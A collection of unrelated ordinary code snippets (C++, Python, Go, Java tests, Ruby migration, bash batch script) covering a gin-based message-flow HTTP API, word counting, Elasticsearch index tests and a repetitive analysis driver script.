    return total;
}
// Demo driver: sums the even values of a fixed array and prints the result.
int main()
{
    int values[] = {2, 3, 5, 6, 8, 9};
    const int count = static_cast<int>(sizeof(values) / sizeof(values[0]));
    std::cout << "Sum of even numbers = " << sumEven(values, count);
    return 0;
}
|
def count_words(text):
    """Count whitespace-separated, lower-cased tokens in ``text``.

    Returns a dict mapping token -> occurrence count. Note that tokens keep
    their punctuation (e.g. ``"dog."`` is distinct from ``"dog"``) -- same
    behavior as before; strip punctuation upstream if that matters.
    """
    wordcount = {}
    for word in text.lower().split():
        # dict.get replaces the old `if word in wordcount.keys()` branch:
        # one lookup instead of a membership test plus an indexed update.
        wordcount[word] = wordcount.get(word, 0) + 1
    return wordcount
def most_frequent(wordcount):
    """Return ``(word, count)`` for the highest count in ``wordcount``.

    An empty mapping yields ``('', 0)``. Ties keep the first word seen in
    iteration order, matching the original behavior.
    """
    best_word, best_count = '', 0
    for word, count in wordcount.items():
        if count > best_count:
            best_word, best_count = word, count
    return (best_word, best_count)
# Demo: count word frequencies in a sample sentence and report the winner
# ("the" wins with 2: "The" and "the" are folded by lower()).
text = 'The quick brown fox jumps over the lazy dog.'
wordcount = count_words(text)
most_frequent_word, max_count = most_frequent(wordcount)
print('Most frequent word:', most_frequent_word, 'with frequency', max_count)
|
package engine
import (
"errors"
"fmt"
"github.com/gin-gonic/gin"
fl "github.com/korableg/flow"
"github.com/korableg/flow/errs"
"github.com/korableg/flow/leveldb"
"github.com/korableg/flow/repo"
"github.com/korableg/mini-gin/config"
"net/http"
"strconv"
)
var engine *gin.Engine
var flow *fl.Flow
// init wires the HTTP engine: gin mode, storage backend, default headers,
// fallback handlers and all node/hub/message routes, then builds the flow.
func init() {
if config.Debug() {
gin.SetMode(gin.DebugMode)
} else {
gin.SetMode(gin.ReleaseMode)
}
var db repo.DB
// NOTE(review): db stays nil for any provider other than "leveldb";
// confirm fl.New tolerates a nil DB or that config validates the provider.
switch config.DBProvider() {
case "leveldb":
db = leveldb.New(config.LevelDB().Path)
}
engine = gin.New()
engine.Use(defaultHeaders())
engine.NoRoute(pageNotFound)
engine.NoMethod(methodNotAllowed)
engine.GET("/node", getAllNodes)
engine.GET("/node/:name", getNode)
engine.POST("/node/:name", newNode)
engine.DELETE("/node/:name", deleteNode)
engine.GET("/hub", getAllHubs)
engine.GET("/hub/:name", getHub)
engine.POST("/hub/:name", newHub)
engine.PATCH("/hub/:action/:nameHub/:nameNode", patchHub)
engine.DELETE("/hub/:name", deleteHub)
engine.POST("/message/tohub/:nodeFrom/:hubTo", sendMessageToHub)
engine.POST("/message/tonode/:nodeFrom/:nodeTo", sendMessageToNode)
engine.GET("/message/:name", getMessage)
engine.DELETE("/message/:name", deleteMessage)
flow = fl.New(db)
}
// Run starts the HTTP server on the configured address in a background
// goroutine; an unexpected listen failure panics that goroutine.
func Run() {
go func() {
err := engine.Run(config.Address())
if err != nil && err != http.ErrServerClosed {
panic(err)
}
}()
}
// Close releases the flow (and its underlying DB).
func Close() error {
return flow.Close()
}
// defaultHeaders stamps every response with a Server header carrying the
// flow version.
func defaultHeaders() gin.HandlerFunc {
return func(c *gin.Context) {
c.Header("Server", fmt.Sprintf("Flow:%s", config.Version()))
}
}
// pageNotFound is the NoRoute fallback: JSON 404.
func pageNotFound(c *gin.Context) {
c.JSON(http.StatusNotFound, errs.New(errs.ErrPageNotFound))
}
// methodNotAllowed is the NoMethod fallback: JSON 405.
func methodNotAllowed(c *gin.Context) {
c.JSON(http.StatusMethodNotAllowed, errs.New(errors.New("method is not allowed")))
}
// getAllNodes returns every registered node as JSON.
func getAllNodes(c *gin.Context) {
nodes := flow.GetAllNodes()
c.JSON(http.StatusOK, nodes)
}
// getNode returns the node named in the path (the body is whatever
// GetNode yields for a missing node -- presumably null; TODO confirm).
func getNode(c *gin.Context) {
name := c.Params.ByName("name")
c.JSON(http.StatusOK, flow.GetNode(name))
}
// newNode creates a node; the "careful" query flag is forwarded to the flow.
// 201 with the node on success, 400 with the wrapped error otherwise.
func newNode(c *gin.Context) {
name := c.Params.ByName("name")
careful := c.Query("careful") == "true"
if n, err := flow.NewNode(name, careful); err == nil {
c.JSON(http.StatusCreated, n)
} else {
c.JSON(http.StatusBadRequest, errs.New(err))
}
}
// deleteNode removes the named node; 500 on failure, bare 200 on success.
func deleteNode(c *gin.Context) {
name := c.Params.ByName("name")
if err := flow.DeleteNode(name); err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
c.Status(http.StatusOK)
}
// getAllHubs returns every registered hub as JSON.
func getAllHubs(c *gin.Context) {
hubs := flow.GetAllHubs()
c.JSON(http.StatusOK, hubs)
}
// getHub returns the hub named in the path.
func getHub(c *gin.Context) {
name := c.Params.ByName("name")
c.JSON(http.StatusOK, flow.GetHub(name))
}
// newHub creates a hub: 201 with the hub, or 400 with the wrapped error.
func newHub(c *gin.Context) {
name := c.Params.ByName("name")
if n, err := flow.NewHub(name); err == nil {
c.JSON(http.StatusCreated, n)
} else {
c.JSON(http.StatusBadRequest, errs.New(err))
}
}
// patchHub attaches ("addnode") or detaches ("deletenode") a node to/from a
// hub and returns the updated hub; unknown actions are a 400.
func patchHub(c *gin.Context) {
	nameHub := c.Params.ByName("nameHub")
	nameNode := c.Params.ByName("nameNode")
	action := c.Params.ByName("action")
	var err error
	switch action {
	case "addnode":
		err = flow.AddNodeToHub(nameHub, nameNode)
	case "deletenode":
		err = flow.DeleteNodeFromHub(nameHub, nameNode)
	default:
		// BUG FIX: was errs.New(errors.New(...)), which got wrapped by
		// errs.New a second time at the response below; keep the plain
		// error here and wrap exactly once, as the other handlers do.
		err = errors.New("action not allowed")
	}
	if err != nil {
		c.JSON(http.StatusBadRequest, errs.New(err))
		return
	}
	c.JSON(http.StatusOK, flow.GetHub(nameHub))
}
// deleteHub removes the named hub; 500 on failure, bare 200 on success.
func deleteHub(c *gin.Context) {
name := c.Params.ByName("name")
if err := flow.DeleteHub(name); err != nil {
c.JSON(http.StatusInternalServerError, errs.New(err))
return
}
c.Status(http.StatusOK)
}
// sendMessageToHub posts the raw request body as a message from nodeFrom to
// every node attached to hubTo.
func sendMessageToHub(c *gin.Context) {
	nodeFrom := c.Params.ByName("nodeFrom")
	hubTo := c.Params.ByName("hubTo")
	data, err := c.GetRawData()
	if err != nil {
		c.JSON(http.StatusInternalServerError, errs.New(err))
		return
	}
	_, err = flow.SendMessageToHub(nodeFrom, hubTo, data)
	if err != nil {
		c.JSON(http.StatusBadRequest, errs.New(err))
		// BUG FIX: missing return -- the handler previously fell through
		// and also wrote a 200 status after the 400 error body.
		return
	}
	c.Status(http.StatusOK)
}
// sendMessageToNode posts the raw request body as a message from nodeFrom
// directly to nodeTo.
func sendMessageToNode(c *gin.Context) {
	nodeFrom := c.Params.ByName("nodeFrom")
	nodeTo := c.Params.ByName("nodeTo")
	data, err := c.GetRawData()
	if err != nil {
		c.JSON(http.StatusInternalServerError, errs.New(err))
		return
	}
	_, err = flow.SendMessageToNode(nodeFrom, nodeTo, data)
	if err != nil {
		c.JSON(http.StatusBadRequest, errs.New(err))
		// BUG FIX: missing return -- the handler previously fell through
		// and also wrote a 200 status after the 400 error body.
		return
	}
	c.Status(http.StatusOK)
}
// getMessage pops the next message for the named node and streams its
// payload, with the message metadata carried in response headers.
// 204 when the queue is empty.
func getMessage(c *gin.Context) {
	name := c.Params.ByName("name")
	m, err := flow.GetMessage(name)
	if err != nil {
		c.JSON(http.StatusBadRequest, errs.New(err))
		return
	}
	if m == nil {
		c.Status(http.StatusNoContent)
		return
	}
	data := m.Data()
	// BUG FIX: headers (and status) were previously set AFTER the body was
	// written via c.Writer.Write, at which point they are ignored because
	// the response is already committed. Set them all before writing.
	c.Header("Message-ID", strconv.FormatInt(m.ID(), 16))
	c.Header("Message-From", m.From())
	c.Header("Content-Type", "application/octet-stream")
	c.Header("Content-Length", strconv.Itoa(len(data)))
	c.Status(http.StatusOK)
	if _, err := c.Writer.Write(data); err != nil {
		// Response already started; nothing safe to send beyond logging
		// space we do not have here -- just stop.
		return
	}
}
// deleteMessage discards the next/named message for the node; 400 with the
// wrapped error on failure, bare 200 on success.
func deleteMessage(c *gin.Context) {
name := c.Params.ByName("name")
err := flow.RemoveMessage(name)
if err != nil {
c.JSON(http.StatusBadRequest, errs.New(err))
return
}
c.Status(http.StatusOK)
}
|
One suggestion to optimize the runtime of a program written in Python is to use vectorized operations with NumPy where possible, as it can offer significant performance gains over native Python code. Additionally, use data structures such as dictionaries, sets and lists, where appropriate, as they can help improve lookup time and memory efficiency. Furthermore, implementing memoization, or caching of intermediate results, can greatly improve the runtime performance of a program by avoiding repeated computation. Finally, use Python profiling tools to identify and optimize the code sections or functions which are the slowest.
|
<gh_stars>0
package org.gbif.pipelines.estools;
import java.util.Collections;
import org.gbif.pipelines.estools.client.EsConfig;
import org.hamcrest.CoreMatchers;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.ExpectedException;
/** Unit tests for {@link EsIndex}. */
public class EsIndexTest {

  private static final String DUMMY_HOST = "http://dummy.com";

  /** {@link Rule} requires this field to be public. */
  @Rule
  public ExpectedException thrown = ExpectedException.none();

  // BUG FIX (all tests below): thrown.expectMessage was previously called
  // AFTER the statement that throws, so it was unreachable and the message
  // was never verified; only the @Test(expected=...) class check ran.
  // ExpectedException expectations must be registered BEFORE the action,
  // and then the expected= attribute becomes redundant.

  @Test
  public void swapIndexInAliasNullAliasTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage("aliases are required");

    EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), null, "index_1");
  }

  @Test
  public void swapIndexInAliasEmptyAliasTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage("aliases are required");

    EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton(""), "index_1");
  }

  @Test
  public void swapIndexInAliasNullIndexTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage("index is required");

    EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton("alias"), null);
  }

  @Test
  public void swapIndexInAliasEmptyIndexTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage("index is required");

    EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton("alias"), "");
  }

  @Test
  public void swapIndexInAliasWrongFormatIndexTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage(CoreMatchers.containsString("index has to follow the pattern"));

    EsIndex.swapIndexInAliases(EsConfig.from(DUMMY_HOST), Collections.singleton("alias"), "index");
  }

  @Test
  public void countIndexDocumentsNullIndexTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage("index is required");

    EsIndex.countDocuments(EsConfig.from(DUMMY_HOST), null);
  }

  @Test
  public void countIndexDocumentsEmptyIndexTest() {
    thrown.expect(IllegalArgumentException.class);
    thrown.expectMessage("index is required");

    EsIndex.countDocuments(EsConfig.from(DUMMY_HOST), "");
  }
}
|
package json
import (
"errors"
"strings"
"github.com/spyzhov/ajson"
)
// EvalExpr evaluates expr against the JSON document and returns the result
// rendered as a string.
//
// NOTE(review): ajson.Must panics (rather than returning an error) when json
// is not valid JSON -- confirm callers expect that.
func EvalExpr(json string, expr string) (string, error) {
	root := ajson.Must(ajson.Unmarshal([]byte(json)))
	// BUG FIX: the expression was previously evaluated twice -- once for the
	// error check and again via ajson.Must -- doing the work double; reuse
	// the first result instead.
	result, err := ajson.Eval(root, expr)
	if err != nil {
		return "", err
	}
	return result.String(), nil
}
// Exists reports whether expr resolves to a non-null value in the JSON
// document. A null result is reported as (false, error).
//
// NOTE(review): ajson.Must panics on invalid JSON input -- confirm callers
// expect that rather than an error return.
func Exists(json string, expr string) (bool, error) {
root := ajson.Must(ajson.Unmarshal([]byte(json)))
result, err := ajson.Eval(root, expr)
if err != nil {
return false, err
}
// NOTE(review): substring matching is fragile -- a legitimate string value
// that merely contains "null" (e.g. "nullable") would be misreported as
// absent; consider checking the node type instead.
if strings.Contains(result.String(), "null") {
return false, errors.New("Expression " + expr + " evaluates to null.")
}
return true, nil
}
|
class AddBandChangeToBatChanges < ActiveRecord::Migration
  # Adds string columns recording the band name before and after a change.
  def self.up
    %i[old_band_name new_band_name].each do |column|
      add_column :bat_changes, column, :string
    end
  end

  # Reverses +up+ by dropping both columns.
  def self.down
    %i[old_band_name new_band_name].each do |column|
      remove_column :bat_changes, column
    end
  end
end
|
#!/bin/bash
# Append all stdout and stderr to bash.log, and route the xtrace output
# (enabled by `set -x` below) into the same file through FD 5.
exec >>bash.log
exec 2>>bash.log
# NOTE(review): FD 5 opens bash.log with truncation (>) while FDs 1/2 append
# -- confirm the truncation of previously-appended content is intentional.
exec 5> bash.log
export BASH_XTRACEFD=5
set -x
sh analyze_simple_1624.sh 1624A/1 1624A/1
sh analyze_simple_1624.sh 1624A/2 1624A/2
sh analyze_simple_1624.sh 1624A/2 1624A/12
sh analyze_simple_1624.sh 1624A/2 1624A/13
sh analyze_simple_1624.sh 1624A/2 1624A/14
sh analyze_simple_1624.sh 1624A/2 1624A/15
sh analyze_simple_1624.sh 1624A/2 1624A/16
sh analyze_simple_1624.sh 1624A/2 1624A/17
sh analyze_simple_1624.sh 1624A/2 1624A/18
sh analyze_simple_1624.sh 1624A/2 1624A/19
sh analyze_simple_1624.sh 1624A/2 1624A/20
sh analyze_simple_1624.sh 1624A/2 1624A/21
sh analyze_simple_1624.sh 1624A/2 1624A/22
sh analyze_simple_1624.sh 1624A/2 1624A/23
sh analyze_simple_1624.sh 1624A/3 1624A/1
sh analyze_simple_1624.sh 1624A/3 1624A/2
sh analyze_simple_1624.sh 1624A/3 1624A/4
sh analyze_simple_1624.sh 1624A/3 1624A/5
sh analyze_simple_1624.sh 1624A/3 1624A/6
sh analyze_simple_1624.sh 1624A/3 1624A/7
sh analyze_simple_1624.sh 1624A/3 1624A/8
sh analyze_simple_1624.sh 1624A/3 1624A/9
sh analyze_simple_1624.sh 1624A/3 1624A/10
sh analyze_simple_1624.sh 1624A/3 1624A/11
sh analyze_simple_1624.sh 1624A/3 1624A/12
sh analyze_simple_1624.sh 1624A/3 1624A/13
sh analyze_simple_1624.sh 1624A/3 1624A/14
sh analyze_simple_1624.sh 1624A/3 1624A/15
sh analyze_simple_1624.sh 1624A/3 1624A/16
sh analyze_simple_1624.sh 1624A/3 1624A/17
sh analyze_simple_1624.sh 1624A/3 1624A/18
sh analyze_simple_1624.sh 1624A/3 1624A/19
sh analyze_simple_1624.sh 1624A/3 1624A/20
sh analyze_simple_1624.sh 1624A/3 1624A/21
sh analyze_simple_1624.sh 1624A/3 1624A/22
sh analyze_simple_1624.sh 1624A/3 1624A/23
sh analyze_simple_1624.sh 1624A/4 1624A/1
sh analyze_simple_1624.sh 1624A/4 1624A/2
sh analyze_simple_1624.sh 1624A/4 1624A/3
sh analyze_simple_1624.sh 1624A/4 1624A/5
sh analyze_simple_1624.sh 1624A/4 1624A/6
sh analyze_simple_1624.sh 1624A/4 1624A/7
sh analyze_simple_1624.sh 1624A/4 1624A/8
sh analyze_simple_1624.sh 1624A/4 1624A/9
sh analyze_simple_1624.sh 1624A/4 1624A/10
sh analyze_simple_1624.sh 1624A/4 1624A/11
sh analyze_simple_1624.sh 1624A/4 1624A/12
sh analyze_simple_1624.sh 1624A/4 1624A/13
sh analyze_simple_1624.sh 1624A/4 1624A/14
sh analyze_simple_1624.sh 1624A/4 1624A/15
sh analyze_simple_1624.sh 1624A/4 1624A/16
sh analyze_simple_1624.sh 1624A/4 1624A/17
sh analyze_simple_1624.sh 1624A/4 1624A/18
sh analyze_simple_1624.sh 1624A/4 1624A/19
sh analyze_simple_1624.sh 1624A/4 1624A/20
sh analyze_simple_1624.sh 1624A/4 1624A/21
sh analyze_simple_1624.sh 1624A/4 1624A/22
sh analyze_simple_1624.sh 1624A/4 1624A/23
sh analyze_simple_1624.sh 1624A/5 1624A/1
sh analyze_simple_1624.sh 1624A/5 1624A/2
sh analyze_simple_1624.sh 1624A/5 1624A/3
sh analyze_simple_1624.sh 1624A/5 1624A/4
sh analyze_simple_1624.sh 1624A/5 1624A/6
sh analyze_simple_1624.sh 1624A/5 1624A/7
sh analyze_simple_1624.sh 1624A/5 1624A/8
sh analyze_simple_1624.sh 1624A/5 1624A/9
sh analyze_simple_1624.sh 1624A/5 1624A/10
sh analyze_simple_1624.sh 1624A/5 1624A/11
sh analyze_simple_1624.sh 1624A/5 1624A/12
sh analyze_simple_1624.sh 1624A/5 1624A/13
sh analyze_simple_1624.sh 1624A/5 1624A/14
sh analyze_simple_1624.sh 1624A/5 1624A/15
sh analyze_simple_1624.sh 1624A/5 1624A/16
sh analyze_simple_1624.sh 1624A/5 1624A/17
sh analyze_simple_1624.sh 1624A/5 1624A/18
sh analyze_simple_1624.sh 1624A/5 1624A/19
sh analyze_simple_1624.sh 1624A/5 1624A/20
sh analyze_simple_1624.sh 1624A/5 1624A/21
sh analyze_simple_1624.sh 1624A/5 1624A/22
sh analyze_simple_1624.sh 1624A/5 1624A/23
sh analyze_simple_1624.sh 1624A/6 1624A/1
sh analyze_simple_1624.sh 1624A/6 1624A/2
sh analyze_simple_1624.sh 1624A/6 1624A/3
sh analyze_simple_1624.sh 1624A/6 1624A/4
sh analyze_simple_1624.sh 1624A/6 1624A/5
sh analyze_simple_1624.sh 1624A/6 1624A/7
sh analyze_simple_1624.sh 1624A/6 1624A/8
sh analyze_simple_1624.sh 1624A/6 1624A/9
sh analyze_simple_1624.sh 1624A/6 1624A/10
sh analyze_simple_1624.sh 1624A/6 1624A/11
sh analyze_simple_1624.sh 1624A/6 1624A/12
sh analyze_simple_1624.sh 1624A/6 1624A/13
sh analyze_simple_1624.sh 1624A/6 1624A/14
sh analyze_simple_1624.sh 1624A/6 1624A/15
sh analyze_simple_1624.sh 1624A/6 1624A/16
sh analyze_simple_1624.sh 1624A/6 1624A/17
sh analyze_simple_1624.sh 1624A/6 1624A/18
sh analyze_simple_1624.sh 1624A/6 1624A/19
sh analyze_simple_1624.sh 1624A/6 1624A/20
sh analyze_simple_1624.sh 1624A/6 1624A/21
sh analyze_simple_1624.sh 1624A/6 1624A/22
sh analyze_simple_1624.sh 1624A/6 1624A/23
sh analyze_simple_1624.sh 1624A/7 1624A/1
sh analyze_simple_1624.sh 1624A/7 1624A/2
sh analyze_simple_1624.sh 1624A/7 1624A/3
sh analyze_simple_1624.sh 1624A/7 1624A/4
sh analyze_simple_1624.sh 1624A/7 1624A/5
sh analyze_simple_1624.sh 1624A/7 1624A/6
sh analyze_simple_1624.sh 1624A/7 1624A/8
sh analyze_simple_1624.sh 1624A/7 1624A/9
sh analyze_simple_1624.sh 1624A/7 1624A/10
sh analyze_simple_1624.sh 1624A/7 1624A/11
sh analyze_simple_1624.sh 1624A/7 1624A/12
sh analyze_simple_1624.sh 1624A/7 1624A/13
sh analyze_simple_1624.sh 1624A/7 1624A/14
sh analyze_simple_1624.sh 1624A/7 1624A/15
sh analyze_simple_1624.sh 1624A/7 1624A/16
sh analyze_simple_1624.sh 1624A/7 1624A/17
sh analyze_simple_1624.sh 1624A/7 1624A/18
sh analyze_simple_1624.sh 1624A/7 1624A/19
sh analyze_simple_1624.sh 1624A/7 1624A/20
sh analyze_simple_1624.sh 1624A/7 1624A/21
sh analyze_simple_1624.sh 1624A/7 1624A/22
sh analyze_simple_1624.sh 1624A/7 1624A/23
sh analyze_simple_1624.sh 1624A/8 1624A/1
sh analyze_simple_1624.sh 1624A/8 1624A/2
sh analyze_simple_1624.sh 1624A/8 1624A/3
sh analyze_simple_1624.sh 1624A/8 1624A/4
sh analyze_simple_1624.sh 1624A/8 1624A/5
sh analyze_simple_1624.sh 1624A/8 1624A/6
sh analyze_simple_1624.sh 1624A/8 1624A/7
sh analyze_simple_1624.sh 1624A/8 1624A/9
sh analyze_simple_1624.sh 1624A/8 1624A/10
sh analyze_simple_1624.sh 1624A/8 1624A/11
sh analyze_simple_1624.sh 1624A/8 1624A/12
sh analyze_simple_1624.sh 1624A/8 1624A/13
sh analyze_simple_1624.sh 1624A/8 1624A/14
sh analyze_simple_1624.sh 1624A/8 1624A/15
sh analyze_simple_1624.sh 1624A/8 1624A/16
sh analyze_simple_1624.sh 1624A/8 1624A/17
sh analyze_simple_1624.sh 1624A/8 1624A/18
sh analyze_simple_1624.sh 1624A/8 1624A/19
sh analyze_simple_1624.sh 1624A/8 1624A/20
sh analyze_simple_1624.sh 1624A/8 1624A/21
sh analyze_simple_1624.sh 1624A/8 1624A/22
sh analyze_simple_1624.sh 1624A/8 1624A/23
sh analyze_simple_1624.sh 1624A/9 1624A/1
sh analyze_simple_1624.sh 1624A/9 1624A/2
sh analyze_simple_1624.sh 1624A/9 1624A/3
sh analyze_simple_1624.sh 1624A/9 1624A/4
sh analyze_simple_1624.sh 1624A/9 1624A/5
sh analyze_simple_1624.sh 1624A/9 1624A/6
sh analyze_simple_1624.sh 1624A/9 1624A/7
sh analyze_simple_1624.sh 1624A/9 1624A/8
sh analyze_simple_1624.sh 1624A/9 1624A/10
sh analyze_simple_1624.sh 1624A/9 1624A/11
sh analyze_simple_1624.sh 1624A/9 1624A/12
sh analyze_simple_1624.sh 1624A/9 1624A/13
sh analyze_simple_1624.sh 1624A/9 1624A/14
sh analyze_simple_1624.sh 1624A/9 1624A/15
sh analyze_simple_1624.sh 1624A/9 1624A/16
sh analyze_simple_1624.sh 1624A/9 1624A/17
sh analyze_simple_1624.sh 1624A/9 1624A/18
sh analyze_simple_1624.sh 1624A/9 1624A/19
sh analyze_simple_1624.sh 1624A/9 1624A/20
sh analyze_simple_1624.sh 1624A/9 1624A/21
sh analyze_simple_1624.sh 1624A/9 1624A/22
sh analyze_simple_1624.sh 1624A/9 1624A/23
sh analyze_simple_1624.sh 1624A/10 1624A/1
sh analyze_simple_1624.sh 1624A/10 1624A/2
sh analyze_simple_1624.sh 1624A/10 1624A/3
sh analyze_simple_1624.sh 1624A/10 1624A/4
sh analyze_simple_1624.sh 1624A/10 1624A/5
sh analyze_simple_1624.sh 1624A/10 1624A/6
sh analyze_simple_1624.sh 1624A/10 1624A/7
sh analyze_simple_1624.sh 1624A/10 1624A/8
sh analyze_simple_1624.sh 1624A/10 1624A/9
sh analyze_simple_1624.sh 1624A/10 1624A/11
sh analyze_simple_1624.sh 1624A/10 1624A/12
sh analyze_simple_1624.sh 1624A/10 1624A/13
sh analyze_simple_1624.sh 1624A/10 1624A/14
sh analyze_simple_1624.sh 1624A/10 1624A/15
sh analyze_simple_1624.sh 1624A/10 1624A/16
sh analyze_simple_1624.sh 1624A/10 1624A/17
sh analyze_simple_1624.sh 1624A/10 1624A/18
sh analyze_simple_1624.sh 1624A/10 1624A/19
sh analyze_simple_1624.sh 1624A/10 1624A/20
sh analyze_simple_1624.sh 1624A/10 1624A/21
sh analyze_simple_1624.sh 1624A/10 1624A/22
sh analyze_simple_1624.sh 1624A/10 1624A/23
sh analyze_simple_1624.sh 1624A/11 1624A/1
sh analyze_simple_1624.sh 1624A/11 1624A/2
sh analyze_simple_1624.sh 1624A/11 1624A/3
sh analyze_simple_1624.sh 1624A/11 1624A/4
sh analyze_simple_1624.sh 1624A/11 1624A/5
sh analyze_simple_1624.sh 1624A/11 1624A/6
sh analyze_simple_1624.sh 1624A/11 1624A/7
sh analyze_simple_1624.sh 1624A/11 1624A/8
sh analyze_simple_1624.sh 1624A/11 1624A/9
sh analyze_simple_1624.sh 1624A/11 1624A/10
sh analyze_simple_1624.sh 1624A/11 1624A/12
sh analyze_simple_1624.sh 1624A/11 1624A/13
sh analyze_simple_1624.sh 1624A/11 1624A/14
sh analyze_simple_1624.sh 1624A/11 1624A/15
sh analyze_simple_1624.sh 1624A/11 1624A/16
sh analyze_simple_1624.sh 1624A/11 1624A/17
sh analyze_simple_1624.sh 1624A/11 1624A/18
sh analyze_simple_1624.sh 1624A/11 1624A/19
sh analyze_simple_1624.sh 1624A/11 1624A/20
sh analyze_simple_1624.sh 1624A/11 1624A/21
sh analyze_simple_1624.sh 1624A/11 1624A/22
sh analyze_simple_1624.sh 1624A/11 1624A/23
sh analyze_simple_1624.sh 1624A/12 1624A/1
sh analyze_simple_1624.sh 1624A/12 1624A/2
sh analyze_simple_1624.sh 1624A/12 1624A/3
sh analyze_simple_1624.sh 1624A/12 1624A/4
sh analyze_simple_1624.sh 1624A/12 1624A/5
sh analyze_simple_1624.sh 1624A/12 1624A/6
sh analyze_simple_1624.sh 1624A/12 1624A/7
sh analyze_simple_1624.sh 1624A/12 1624A/8
sh analyze_simple_1624.sh 1624A/12 1624A/9
sh analyze_simple_1624.sh 1624A/12 1624A/10
sh analyze_simple_1624.sh 1624A/12 1624A/11
sh analyze_simple_1624.sh 1624A/12 1624A/13
sh analyze_simple_1624.sh 1624A/12 1624A/14
sh analyze_simple_1624.sh 1624A/12 1624A/15
sh analyze_simple_1624.sh 1624A/12 1624A/16
sh analyze_simple_1624.sh 1624A/12 1624A/17
sh analyze_simple_1624.sh 1624A/12 1624A/18
sh analyze_simple_1624.sh 1624A/12 1624A/19
sh analyze_simple_1624.sh 1624A/12 1624A/20
sh analyze_simple_1624.sh 1624A/12 1624A/21
sh analyze_simple_1624.sh 1624A/12 1624A/22
sh analyze_simple_1624.sh 1624A/12 1624A/23
sh analyze_simple_1624.sh 1624A/13 1624A/1
sh analyze_simple_1624.sh 1624A/13 1624A/2
sh analyze_simple_1624.sh 1624A/13 1624A/3
sh analyze_simple_1624.sh 1624A/13 1624A/4
sh analyze_simple_1624.sh 1624A/13 1624A/5
sh analyze_simple_1624.sh 1624A/13 1624A/6
sh analyze_simple_1624.sh 1624A/13 1624A/7
sh analyze_simple_1624.sh 1624A/13 1624A/8
sh analyze_simple_1624.sh 1624A/13 1624A/9
sh analyze_simple_1624.sh 1624A/13 1624A/10
sh analyze_simple_1624.sh 1624A/13 1624A/11
sh analyze_simple_1624.sh 1624A/13 1624A/12
sh analyze_simple_1624.sh 1624A/13 1624A/14
sh analyze_simple_1624.sh 1624A/13 1624A/15
sh analyze_simple_1624.sh 1624A/13 1624A/16
sh analyze_simple_1624.sh 1624A/13 1624A/17
sh analyze_simple_1624.sh 1624A/13 1624A/18
sh analyze_simple_1624.sh 1624A/13 1624A/19
sh analyze_simple_1624.sh 1624A/13 1624A/20
sh analyze_simple_1624.sh 1624A/13 1624A/21
sh analyze_simple_1624.sh 1624A/13 1624A/22
sh analyze_simple_1624.sh 1624A/13 1624A/23
sh analyze_simple_1624.sh 1624A/14 1624A/1
sh analyze_simple_1624.sh 1624A/14 1624A/2
sh analyze_simple_1624.sh 1624A/14 1624A/3
sh analyze_simple_1624.sh 1624A/14 1624A/4
sh analyze_simple_1624.sh 1624A/14 1624A/5
sh analyze_simple_1624.sh 1624A/14 1624A/6
sh analyze_simple_1624.sh 1624A/14 1624A/7
sh analyze_simple_1624.sh 1624A/14 1624A/8
sh analyze_simple_1624.sh 1624A/14 1624A/9
sh analyze_simple_1624.sh 1624A/14 1624A/10
sh analyze_simple_1624.sh 1624A/14 1624A/11
sh analyze_simple_1624.sh 1624A/14 1624A/12
sh analyze_simple_1624.sh 1624A/14 1624A/13
sh analyze_simple_1624.sh 1624A/14 1624A/15
sh analyze_simple_1624.sh 1624A/14 1624A/16
sh analyze_simple_1624.sh 1624A/14 1624A/17
sh analyze_simple_1624.sh 1624A/14 1624A/18
sh analyze_simple_1624.sh 1624A/14 1624A/19
sh analyze_simple_1624.sh 1624A/14 1624A/20
sh analyze_simple_1624.sh 1624A/14 1624A/21
sh analyze_simple_1624.sh 1624A/14 1624A/22
sh analyze_simple_1624.sh 1624A/14 1624A/23
sh analyze_simple_1624.sh 1624A/15 1624A/1
sh analyze_simple_1624.sh 1624A/15 1624A/2
sh analyze_simple_1624.sh 1624A/15 1624A/3
sh analyze_simple_1624.sh 1624A/15 1624A/4
sh analyze_simple_1624.sh 1624A/15 1624A/5
sh analyze_simple_1624.sh 1624A/15 1624A/6
sh analyze_simple_1624.sh 1624A/15 1624A/7
sh analyze_simple_1624.sh 1624A/15 1624A/8
sh analyze_simple_1624.sh 1624A/15 1624A/9
sh analyze_simple_1624.sh 1624A/15 1624A/10
sh analyze_simple_1624.sh 1624A/15 1624A/11
sh analyze_simple_1624.sh 1624A/15 1624A/12
sh analyze_simple_1624.sh 1624A/15 1624A/13
sh analyze_simple_1624.sh 1624A/15 1624A/14
sh analyze_simple_1624.sh 1624A/15 1624A/16
sh analyze_simple_1624.sh 1624A/15 1624A/17
sh analyze_simple_1624.sh 1624A/15 1624A/18
sh analyze_simple_1624.sh 1624A/15 1624A/19
sh analyze_simple_1624.sh 1624A/15 1624A/20
sh analyze_simple_1624.sh 1624A/15 1624A/21
sh analyze_simple_1624.sh 1624A/15 1624A/22
sh analyze_simple_1624.sh 1624A/15 1624A/23
sh analyze_simple_1624.sh 1624A/16 1624A/1
sh analyze_simple_1624.sh 1624A/16 1624A/2
sh analyze_simple_1624.sh 1624A/16 1624A/3
sh analyze_simple_1624.sh 1624A/16 1624A/4
sh analyze_simple_1624.sh 1624A/16 1624A/5
sh analyze_simple_1624.sh 1624A/16 1624A/6
sh analyze_simple_1624.sh 1624A/16 1624A/7
sh analyze_simple_1624.sh 1624A/16 1624A/8
sh analyze_simple_1624.sh 1624A/16 1624A/9
sh analyze_simple_1624.sh 1624A/16 1624A/10
sh analyze_simple_1624.sh 1624A/16 1624A/11
sh analyze_simple_1624.sh 1624A/16 1624A/12
sh analyze_simple_1624.sh 1624A/16 1624A/13
sh analyze_simple_1624.sh 1624A/16 1624A/14
sh analyze_simple_1624.sh 1624A/16 1624A/15
sh analyze_simple_1624.sh 1624A/16 1624A/17
